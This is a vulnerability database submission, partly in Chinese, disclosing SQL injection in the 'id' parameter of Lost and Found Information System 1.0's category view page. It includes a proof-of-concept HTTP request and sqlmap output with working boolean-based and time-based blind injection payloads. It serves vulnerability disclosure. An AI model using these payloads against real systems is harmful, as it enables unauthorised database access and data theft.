提交 #155230: SQL Injection in view category function in Lost and Found Information System信息

标题	SQL Injection in view category function in Lost and Found Information System
描述	SQL Injection in view category function in Lost and Found Information System 1.0 parameter: id Producion: Lost and Found Information System Version: 1.0 PoC: Request: GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/php-lfis/admin/?page=categories Connection: close Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Run request with sqlmap and output: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb ---
来源	⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
用户	huutuanbg97 (UID 45015)
提交	2023-05-11 17時32分 (3 年前)
管理	2023-05-12 08時01分 (14 hours later)
状态	已接受
VulDB条目	228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category 标识符 SQL注入]
积分	20

◂ 上一步一览下一步 ▸

Do you know our Splunk app?

Download it now for free!